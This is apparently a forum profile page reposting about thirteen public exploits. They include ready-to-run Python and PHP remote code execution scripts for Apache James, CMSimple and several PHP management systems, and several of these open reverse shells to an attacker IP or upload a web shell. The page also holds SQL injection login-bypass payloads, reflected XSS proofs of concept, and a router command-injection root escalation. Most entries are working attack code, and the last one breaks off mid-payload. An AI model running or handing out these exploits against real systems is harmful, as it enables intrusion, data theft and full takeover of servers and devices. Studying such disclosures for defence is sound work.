HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
     # Date: 27/09/2021
     # Exploit Author: shinris3n
     # Vendor Homepage: http://james.apache.org/server/
     # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
     # Version: Apache James Server 2.3.2
     # Tested on: Ubuntu
     # Info: This exploit works on default installation of Apache James Server 2.3.2
     # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

     '''
     This Python 3 implementation is based on the original (Python 2) exploit code developed by Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec.
     The following modifications were made:
     1 - Made required changes to print and socket commands for Python 3 compatibility.
     2 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
     3 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
     4 - Added a payload that can be used for testing remote command execution and connectivity.
     5 - Added payload and listener information output based on payload selection and user input.
     6 - Added execution output clarifications and additional informational comments throughout the code.

     @shinris3n
     https://twitter.com/shinris3n
     https://shinris3n.github.io/
     '''

     #!/usr/bin/python3
     import socket
     import sys
     import time

     # credentials to James Remote Administration Tool (Default - root/root)
     user = 'root'
     pwd = 'root'

     if len(sys.argv) != 4:
         sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
         sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
         sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
         sys.exit(1)

     remote_ip = sys.argv[1]
     local_ip = sys.argv[2]
     port = sys.argv[3]

     # Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
     payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
     #payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
     #payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
     #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only

     print ("[+]Payload Selected (see script for more options): ", payload)
     if '/bin/bash' in payload:
         print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)

     def recv(s):
         s.recv(1024)
         time.sleep(0.2)

     try:
         print ("[+]Connecting to James Remote Administration Tool...")
         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
         s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
         s.recv(1024)
         s.send((user + "\n").encode('utf-8'))
         s.recv(1024)
         s.send((pwd + "\n").encode('utf-8'))
         s.recv(1024)

         print ("[+]Creating user...")
         s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
         s.recv(1024)
         s.send("quit\n".encode('utf-8'))
         s.close()

         print ("[+]Connecting to James SMTP server...")
         s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
         s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
         s.send("ehlo team@team.pl\r\n".encode('utf-8'))
         recv(s)

         print ("[+]Sending payload...")
         s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
         recv(s)
         # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
         s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
         recv(s)
         s.send("data\r\n".encode('utf-8'))
         recv(s)
         s.send("From: team@team.pl\r\n".encode('utf-8'))
         s.send("\r\n".encode('utf-8'))
         s.send("'\n".encode('utf-8'))
         s.send((payload + "\n").encode('utf-8'))
         s.send("\r\n.\r\n".encode('utf-8'))
         recv(s)
         s.send("quit\r\n".encode('utf-8'))
         recv(s)
         s.close()

         print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
         if '/bin/bash' in payload:
             print ("[+]Don't forget to start a listener on port", port, "before logging in!")
     except:
         print ("Connection failed.")
  2. # Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
     # Date: 2/15/2021
     # Author: 0xB9
     # Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
     # Version: 1.3.1
     # Tested on: Windows 10
     # CVE: CVE-2021-24287

     1. Description:
     The tab parameter in the Admin Panel is vulnerable to XSS.

     2. Proof of Concept:
     wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
  3. # Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
     # Date: 2/3/2021
     # Author: 0xB9
     # Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
     # Version: 1.3.0
     # Tested on: Windows 10
     # CVE: CVE-2021-24286

     1. Description:
     This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.

     2. Proof of Concept:
     wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
  4. # Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
     # Date: 28.09.2021
     # Exploit Author: Fikrat Ghuliev (Ghuliev)
     # Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
     # Version: 1
     # Tested on: Ubuntu

     import requests
     from bs4 import BeautifulSoup
     import sys
     import random
     import string
     import time

     if len(sys.argv) != 4:
         print("[~] Usage : python3 exploit.py localhost ip port")
         exit()

     site = sys.argv[1]
     ip = sys.argv[2]
     port = sys.argv[3]

     shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"
     letters = string.ascii_lowercase
     name = ''.join(random.choice(letters) for i in range(5))

     def LoginAndShellUpload():
         login = 'http://'+site+':80/storage/classes/Login.php?f=login'
         session = requests.session()
         post_data = {"username": "' OR 1=1-- -", "password": "aa"}
         user_login = session.post(login, data=post_data)
         cookie = session.cookies.get_dict()
         print('[+]Success login')
         print('[+]Try Shell upload')
         time.sleep(2)
         #shell upload
         url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
         cookies = cookie
         headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
                    "Accept": "*/*",
                    "Accept-Language": "en-US,en;q=0.5",
                    "Accept-Encoding": "gzip, deflate",
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751",
                    "Origin": "http://localhost",
                    "Connection": "close",
                    "Referer": "http://localhost/storage/admin/?page=system_info",
                    "Sec-Fetch-Dest": "empty",
                    "Sec-Fetch-Mode": "cors",
                    "Sec-Fetch-Site": "same-origin"}
         data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
         requests.post(url, headers=headers, cookies=cookies, data=data)
         print('[+]Success!')
         print('[+]Getting reverse shell')
         time.sleep(2)

     def RCE():
         path = 'http://'+site+'/storage/uploads/'
         html_text = requests.get(path).text
         soup = BeautifulSoup(html_text, 'html.parser')
         for link in soup.find_all('a'):
             data = link.get('href')
             with open('shell_location.txt', 'w') as f:
                 f.write(data)
         path2 = 'shell_location.txt'
         shell_file = open(path2,'r')
         shell = shell_file.readline()
         r = requests.get('http://'+site+'/storage/uploads/'+shell)
         print(r.text)
         print('[+]Hacked!')

     LoginAndShellUpload()
     RCE()
  5. # Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation
     # Date: 10-08-2021
     # Exploit Author: Leonardo Nicolas Servalli
     # Vendor Homepage: www.mitrastar.com
     # Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU)
     # Tested on: Firmware BR_g3.5_100VNZ0b33
     # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md

     Description:
     ----------
     # Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases these routers use default credentials).
     # The command "deviceinfo show file <path>" is used from the reduced CLI to show files and directories. Because this command does not handle special characters correctly, it is possible to insert a second command as a parameter in the <path> value. By using "&&/bin/bash" as the parameter value we can spawn a bash console, as seen in the next example:

     Exploit:
     --------
     > deviceinfo show file &&/bin/bash

     # This command will spawn a full interoperable bash console with root privileges.
  6. # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
     # Date: 28.09.2021
     # Exploit Author: Murat
     # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
     # Version: 1.0
     # Tested on: Windows 10

     # Pharmacy Point of Sale System v1.0 SQLi

     GET /pharmacy/view_product.php?id=-1 HTTP/1.1
     Host: localhost
     Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
     Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
     Sec-Ch-Ua-Mobile: ?0
     Sec-Ch-Ua-Platform: "Windows"
     Upgrade-Insecure-Requests: 1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Sec-Fetch-Site: none
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Accept-Encoding: gzip, deflate
     Connection: close

     POC:
     https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--

     -----------------------------------------------------------------------
     #Other parameters with sql injection vulnerability;

     ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
     ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
     ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1
     ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true
     ==> /pharmacy/manage_product.php?id=-1'

     ==> POST /pharmacy/Actions.php?a=save_stock
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="id"

     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="supplier_id"

     1'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="product_id"

     2'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="quantity"

     1'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="expiry_date"

     ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="id"

     5'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="product_code"

     94102'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="category_id"

     1'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="name"

     pHqghUme'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="price"

     1'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="description"

     1'"
     ------------YWJkMTQzNDcw
     Content-Disposition: form-data; name="status"

     0'"
     ------------YWJkMTQzNDcw--
  7. # Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
     # Date: 29.09.2021
     # Exploit Author: pussycat0x
     # Vendor Homepage: https://www.cmsimple.org/
     # Version: 5.4
     # Tested on: ubuntu-20.04.1

     import argparse
     from bs4 import BeautifulSoup
     from argparse import ArgumentParser
     import requests

     parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
     rparser = parser.add_argument_group('required argument')
     rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
     rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
     rparser.add_argument('-p','--password',type=str,help='', required=True)
     rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
     rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
     args= parser.parse_args()
     #url ='192.168.1.106'
     s = requests.Session()

     def main():
         try:
             url =(args.host)
             payload = {
                 'user':args.username,
                 'passwd':args.password,
                 'submit': 'Login',
                 'login':'true',
             }
             login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
             if login.status_code == 200:
                 print('Exploit Completed')
             else:
                 print("Invalid Credential")
             cook =(login.cookies.get_dict())
             temp = s.get(url +'/?file=template&action=edit', cookies=cook)
             soup = BeautifulSoup(temp.text, 'lxml')
             csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
             #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
             rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
             rev2=(args.lhost)
             rev3=(args.lport)
             rev4=""" 0>&1'");"""
             php =(rev+rev2+'/'+rev3+rev4)
             revpayload = {
                 'cmsimpleDataFileStored':'cmsimpleDataFileStored',
                 'csrf_token':csrfToken,
                 'text':php,
                 'file':'template',
                 'action':'save',
             }
             shell = s.post(url +'/',cookies=cook , data=revpayload)
             exec = s.get(url+'/')
             exit()
         except:
             pass

     main()
  8. # Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
     # Date: 29-09-2021
     # Exploit Author: sudoninja
     # Vendor Homepage: https://phpgurukul.com
     # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
     # Version: 1.0
     # Tested on: XAMPP / Windows 10

     Steps-To-Reproduce:
     Step 1 – Go to the Product admin panel http://localhost/ccms/index.php.
     Step 2 – Enter anything in username and password
     Step 3 – Click on Login and capture the request in the burp suite
     Step 4 – Change the username to ' OR 1 -- - and password to ccms
     Step 5 – Click forward and now you will be logged in as admin.

     POC

     POST /ccms/ HTTP/1.1
     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 49
     Origin: http://localhost
     Connection: close
     Referer: http://localhost/ccms/
     Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
     Upgrade-Insecure-Requests: 1

     username='%20OR%201%20--%20-&password=ccms&login=
  9. # Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
     # Date: 9/24/2021
     # Exploit Author: Eric Salario
     # Vendor Homepage: http://www.os4ed.com/
     # Software Link: https://opensis.com/download
     # Version: 8.0
     # Tested on: Windows, Linux
     # CVE : CVE-2021-40310

     OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.

     1. Login as "teacher".

     2. Navigate to (take attendance):
     http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true

     Decoded request:
     GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

     3. XSS triggers

     PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
  10. # Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      # Date: 28.09.2021
      # Author: Mr.Gedik
      # Vendor Homepage: https://www.sourcecodester.com
      # Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
      # Version: 1.0
      # https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB

      Vulnerable code
      controllers/add_petmanagement.php
      Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"]));

      Exploit
      #############

      <?php
      /* @author:mrgedik */
      function anim($msg, $time) {
          $msg = str_split($msg);
          foreach ($msg as $ms) {
              echo $ms;
              usleep($time);
          }
      }

      anim("__ __ _____ _ _ _ | \/ | / ____| | (_) | | \ / |_ __| | __ ___ __| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | | | | |_ | |__| | __/ (_| | | < |_| |_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900);
      echo PHP_EOL;

      while(1) {
          echo anim("Target (http://example.com/path/): ", 800);
          $target = trim(fgets(STDIN));
          echo PHP_EOL;
          if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
              echo "Not a valid URL".PHP_EOL;
          }else {
              break;
          }
      }

      @unlink("exp.php");
      $fw = fopen("exp.php","a+");
      fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
      fclose($fw);

      $ch = curl_init();
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
      $fields = [
          'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
      ];
      curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
      $response = curl_exec($ch);
      @unlink("exp.php");

      if(strstr($response,"success")) {
          while(1) {
              echo anim("root@pwn: ", 800);
              $command = trim(fgets(STDIN));
              if($command == trim("exit")) {
                  exit;
              }
              $ch = curl_init();
              curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
              curl_setopt($ch, CURLOPT_POST, 1);
              curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
              echo curl_exec($ch);
              curl_close ($ch);
          }
      }else {
          echo anim("Fail", 800);
      }
      ?>
  11. # Exploit Title: Blood Bank System 1.0 - Authentication Bypass
      # Date: 30-9-2021
      # Exploit Author: Nitin Sharma (vidvansh)
      # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
      # Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
      # Version: 1.0
      # Tested on: Windows 10 , Apache , Mysql
      # Description : Password input is affected with authentication bypass because of improper sanitisation which leads to access to unauthorised accounts.

      #Steps-To-Reproduce:
      Step 1 – Go to the Product admin panel http://localhost/bloodbank/login.php.
      Step 2 – Enter anything in username and password
      Step 3 – Click on Login and capture the request in the burp suite
      Step 4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
      Step 5 – Click forward and now you will be logged in as admin.

      # PoC:

      GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/bloodbank/login.php
      Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      # Authentication Bypass:
      # Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
      Username: ** Random email**
      Password: ' or 1 -- -
  12. # Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
      # Date: 30-09-2021
      # Exploit Author: Nitin Sharma (Vidvansh)
      # Vendor Homepage: https://code-projects.org
      # Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
      # Version: 1.0
      # Tested on: XAMPP / Windows 10

      Steps-To-Reproduce:
      Step 1 – Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
      Step 2 – Enter anything in username and password
      Step 3 – Click on Login and capture the request in the burp suite
      Step 4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
      Step 5 – Click forward and now you will be logged in as admin.

      POC

      POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 40
      Origin: http://localhost
      Connection: close
      Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
      Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
      Upgrade-Insecure-Requests: 1
      Sec-Fetch-Dest: document
      Sec-Fetch-Mode: navigate
      Sec-Fetch-Site: same-origin
      Sec-Fetch-User: ?1

      email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
  13. # Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
      # Date: 30.09.2021
      # Exploit Author: Fikrat Ghuliev (Ghuliev)
      # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
      # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
      # Version: 1.0
      # Tested on: Ubuntu

      import requests
      from bs4 import BeautifulSoup
      import sys
      import random
      import string
      import time

      print("""
      [+] Vehicle Service Management System
      [!] Auth bypass + shell upload = RCE
      """)
      time.sleep(2)

      if len(sys.argv) != 4:
          print("[~] Usage : python3 exploit.py localhost ip port")
          exit()

      site = sys.argv[1]
      ip = sys.argv[2]
      port = sys.argv[3]

      shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"
      letters = string.ascii_lowercase
      name = ''.join(random.choice(letters) for i in range(5))

      def LoginAndShellUpload():
          print("[+] Try Login")
          time.sleep(1)
          login = 'http://'+site+'/vehicle_service/admin/login.php'
          session = requests.session()
          post_data = {"username": "' OR 1=1-- -", "password": "aa"}
          user_login = session.post(login, data=post_data)
          cookie = session.cookies.get_dict()
          print('[+]Success login')
          print('[+]Try Shell upload')
          time.sleep(2)
          #shell upload
          url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings'
          cookies = cookie
          # The boundary declared in Content-Type must match the one used in the body below,
          # otherwise the server cannot parse the multipart request.
          headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
                     "Accept": "*/*",
                     "Accept-Language": "en-US,en;q=0.5",
                     "Accept-Encoding": "gzip, deflate",
                     "X-Requested-With": "XMLHttpRequest",
                     "Content-Type": "multipart/form-data; boundary=---------------------------38784447663334447953661330489",
                     "Origin": "http://localhost",
                     "Connection": "close",
                     "Referer": "http://localhost/church_management/admin/?page=system_info",
                     "Sec-Fetch-Dest": "empty",
                     "Sec-Fetch-Mode": "cors",
                     "Sec-Fetch-Site": "same-origin"}
          data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n<p style=\"text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;\">About Us</p><hr style=\"margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));\"><div id=\"Content\" style=\"margin: 0px; padding: 0px; position: relative;\"><div id=\"bannerL\" style=\"margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div id=\"bannerR\" style=\"margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div class=\"boxed\" style=\"margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);\"><div id=\"lipsum\" style=\"margin: 0px; padding: 0px; text-align: justify;\"></div></div></div><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque 